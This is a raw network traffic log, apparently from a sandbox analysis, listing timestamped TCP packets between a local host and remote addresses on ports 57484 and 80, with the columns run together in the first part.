                                                            Aug 28, 2024 14:01:57.477411985 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477430105 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477443933 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477490902 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477502108 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477514029 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477530956 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477544069 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477559090 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477567911 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477571011 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477608919 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477654934 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477667093 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477682114 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477698088 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477699995 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477710009 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477721930 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477735996 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477741957 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477766991 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477835894 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477847099 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477869034 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477874994 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477891922 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477904081 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.477916956 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.477937937 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478009939 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478022099 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478033066 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478054047 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478118896 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478154898 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478205919 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478215933 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478235960 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478247881 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478252888 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478260994 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478275061 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478281021 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478312016 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478810072 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478879929 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478889942 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.478916883 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.478952885 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479000092 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479005098 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479015112 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479049921 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479063034 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479074955 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479088068 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479100943 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479108095 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479136944 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479219913 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479233027 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479245901 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479259014 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479265928 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479291916 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479299068 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479311943 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479324102 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479336977 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479346037 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479361057 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479377031 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479382038 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479394913 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479410887 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479418993 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479450941 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479477882 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479845047 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479892969 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479912996 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479926109 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479938030 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479950905 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479959011 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479975939 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479986906 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.479988098 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.479999065 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.480019093 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486319065 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486332893 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486352921 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486366987 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486375093 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486382008 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486393929 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486397028 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486419916 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486426115 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486465931 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486466885 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486479998 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486491919 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486505985 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486514091 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486526966 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486538887 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486538887 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486552954 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486565113 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486573935 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486598969 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486603022 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486614943 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486645937 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486675978 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486687899 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486700058 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486711979 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486720085 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.486725092 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.486745119 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.517978907 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.524775028 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524800062 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524810076 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524823904 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.524858952 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.524878979 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524889946 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524909019 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524919033 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.524921894 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524933100 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.524954081 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.525430918 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525470018 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.525583029 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525593042 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525604010 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525615931 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525626898 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525639057 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525640965 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.525650978 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525662899 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.525674105 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.525688887 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.525707960 CEST4973957484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:01:57.563796043 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.563812971 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.563832045 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.563843966 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.563855886 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.563868046 CEST5748449739172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:01:57.563906908 CEST4973957484192.168.2.4172.111.137.132
Aug 28, 2024 14:01:57.563937902 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.564068079 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564259052 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564274073 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564285040 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564301968 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.564321995 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564325094 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.564332008 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564342022 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564353943 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564367056 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564378023 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.564405918 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.564982891 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.564995050 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565007925 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565020084 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565036058 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565047979 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565057993 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565083027 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565112114 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565124035 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565134048 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565160036 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565306902 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565341949 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565359116 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565371037 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565403938 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565407038 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565431118 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565465927 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565478086 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565507889 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.565830946 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565841913 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.565869093 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.566030979 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566070080 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566070080 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.566081047 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566116095 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.566370964 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566382885 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566395044 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566409111 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:01:57.566416025 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.566452026 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:01:57.653868914 CEST    80    49741    178.237.33.50    192.168.2.4
Aug 28, 2024 14:01:57.653927088 CEST    49741    80    192.168.2.4    178.237.33.50
Aug 28, 2024 14:02:00.428061008 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:00.433131933 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:00.433219910 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:00.433391094 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:00.438137054 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:00.627969027 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:02:00.633035898 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633043051 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633044004 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633044958 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633045912 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633116961 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:02:00.633162975 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633297920 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633306980 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.633310080 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.637675047 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.637914896 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.637923956 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.637933969 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.637981892 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.638019085 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.638041973 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.638103008 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.713601112 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:02:00.722037077 CEST    57484    49739    172.111.137.132    192.168.2.4
Aug 28, 2024 14:02:00.722091913 CEST    49739    57484    192.168.2.4    172.111.137.132
Aug 28, 2024 14:02:01.145034075 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145047903 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145060062 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145066023 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145078897 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145095110 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145109892 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145112991 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.145123959 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145136118 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145143986 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.145149946 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.145158052 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.145191908 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.150640965 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.150652885 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.150665998 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.150712967 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.256458998 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.265939951 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.265953064 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.265964031 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.266006947 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.266052961 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.266067028 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.266078949 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.266091108 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.266119003 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.266148090 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.266160965 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.266195059 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.266999960 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267010927 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267020941 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267045975 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.267364979 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267411947 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267422915 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267436981 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.267448902 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.267462015 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.387085915 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387108088 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387118101 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387171984 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.387212038 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.387453079 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387474060 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387485981 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387516022 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.387543917 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387556076 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387567997 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.387583971 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.387617111 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.388160944 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388274908 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388287067 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388298988 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388323069 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.388350964 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.388668060 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388680935 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388691902 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388727903 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.388799906 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388813019 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388825893 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.388848066 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.388865948 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.389645100 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.389705896 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.389754057 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.507658958 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507675886 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507688046 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507708073 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507811069 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.507811069 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.507838964 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507853031 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507865906 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507878065 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.507895947 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.507920027 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.508431911 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.508492947 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.508505106 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.508516073 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.508539915 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.508562088 CEST    80    49742    193.25.216.165    192.168.2.4
